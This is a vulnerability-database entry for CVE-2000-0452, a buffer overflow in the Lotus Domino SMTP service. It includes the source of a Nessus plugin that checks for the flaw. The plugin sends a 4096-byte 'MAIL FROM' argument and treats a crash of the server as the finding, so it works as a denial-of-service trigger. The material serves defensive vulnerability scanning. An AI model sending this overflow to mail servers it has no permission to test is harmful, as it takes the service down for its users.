Vulnerabilities > CVE-2000-0452 - Unspecified vulnerability in Lotus Domino Enterprise Server and Domino Mail Server

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
lotus
nessus
exploit available

Summary

Buffer overflow in the ESMTP service of Lotus Domino Server 5.0.1 allows remote attackers to cause a denial of service via a long MAIL FROM command.

Exploit-Db

description: Lotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3, Mail Server 5.0.1/5.0.2/5.0.3 Buffer Overflow. CVE-2000-0452, CVE-2000-1046. Remote exploits for multiple pla...
id: EDB-ID:19944
last seen: 2016-02-02
modified: 2000-05-18
published: 2000-05-18
reporter: smiler
source: https://www.exploit-db.com/download/19944/
title: Lotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3, Mail Server 5.0.1/5.0.2/5.0.3 - Buffer Overflow

Nessus

NASL family: SMTP problems
NASL id: LOTUS_ESMTP_OVERFLOW.NASL
description: The remote Lotus Domino SMTP server is affected by a buffer overflow vulnerability that can be triggered by an overly long argument to the 'MAIL FROM' command.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 10419
published: 2000-05-25
reporter: This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/10419
title: Lotus Domino SMTP MAIL FROM Command Remote Overflow
code
#
# (C) Tenable Network Security, Inc.
#

# Ref:
# From: "K. K. Mookhey" <[email protected]>
# To: [email protected], [email protected],
#  [email protected]
# Date: Mon, 11 Nov 2002 13:55:04 +0530
# Subject: Buffer Overflow in iSMTP Gateway
#

include("compat.inc");

# Registration phase: when 'description' is set, only the metadata below is
# recorded and the script exits before any of the network code further down.
if (description)
{
  # Plugin identity and revision.
  script_id(10419);
  script_version("1.35");
  script_cvs_date("Date: 2018/11/15 20:50:24");

  # External identifiers tracked for this finding.
  script_cve_id("CVE-2000-0452");
  script_bugtraq_id(1229);

  script_name(english:"Lotus Domino SMTP MAIL FROM Command Remote Overflow");
  script_summary(english:"Overflows a buffer in the remote mail server");
  script_family(english:"SMTP problems");
  script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");

  # Destructive category: the check sends the oversized argument itself, so a
  # vulnerable mail service may stop answering after the scan. Schedule it
  # accordingly on production mail servers.
  script_category(ACT_DESTRUCTIVE_ATTACK);

  script_set_attribute(attribute:"synopsis", value:
"The remote SMTP server is affected by a remote buffer overflow
vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote Lotus Domino SMTP server is affected by a buffer overflow
vulnerability that can be triggered by an overly long argument to the
'MAIL FROM' command.

This problem may allow an attacker to crash the mail server or even
allow the execution of arbitrary code on this system.");
  script_set_attribute(attribute:"see_also", value:"https://downloads.securityfocus.com/vulnerabilities/exploits/smtpkill.pl");
  script_set_attribute(attribute:"solution", value:"Contact the vendor for a patch.");

  # NOTE(review): the base vector rates complete C/I/A impact, in line with the
  # code-execution possibility named in the description above. The CVE summary
  # shown alongside this plugin describes denial of service only (CVSS 5.0,
  # partial availability impact), so the two sources score this differently.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2000/05/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2000/05/25");

  # Marked as potential: the script body infers the flaw from the service no
  # longer presenting a banner, not from a version match.
  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:lotus:domino_enterprise_server");
  script_end_attributes();

  # Scheduling constraints: SMTP detection runs first, and the paranoid-report
  # key is required (the script body checks report_paranoia as well).
  script_dependencie("smtpserver_detect.nasl", "sendmail_expn.nasl");
  script_require_keys("Settings/ParanoidReport");
  script_require_ports("Services/smtp", 25);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("smtp_func.inc");

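# Active check. Confirms a Lotus Domino banner, sends one oversized MAIL FROM
# argument, then reconnects; a service that no longer presents an SMTP banner
# is reported. The result is indirect evidence (an outage), which is why the
# check is limited to paranoid reporting.
if (report_paranoia < 2) audit(AUDIT_PARANOID);


port = get_service(svc:"smtp", default: 25, exit_on_fail: 1);
# Skip ports flagged as broken in the knowledge base (presumably set by an
# earlier SMTP plugin -- confirm against the dependencies).
if (get_kb_item('SMTP/'+port+'/broken')) exit(0);


soc = open_sock_tcp(port);
if (! soc) exit(1);

# Only Lotus Domino banners are in scope; release the socket before leaving.
data = smtp_recv_banner(socket:soc);
if ( ! data || "Lotus Domino" >!< data )
{
  close(soc);
  exit(0);
}

send(socket:soc, data:'HELO example.com\r\n');
data = recv_line(socket:soc, length:1024);
if ("250 " >!< data)
{
  # HELO was not accepted, so the test command is never sent. Stop here: a
  # failed reconnect afterwards would say nothing about this flaw and would
  # otherwise be reported as a finding.
  close(soc);
  exit(0);
}

crp = 'MAIL FROM: nessus@' + crap(4096) + '\r\n';
send(socket:soc, data:crp);
# Read (and discard) the reply so the server has processed the command before
# the connection is dropped.
recv_line(socket:soc, length:1024);
close(soc);

# Liveness check on a fresh connection; close it once the banner is read.
soc = open_sock_tcp(port);
if (soc)
{
  r = smtp_recv_banner(socket:soc);
  close(soc);
}
else r = 0;

# No banner after the test command: treat the service as affected.
# NOTE(review): a transient network failure at this point looks the same as a
# crash, so confirm the finding against the server's own logs or patch level.
if (!r) security_hole(port);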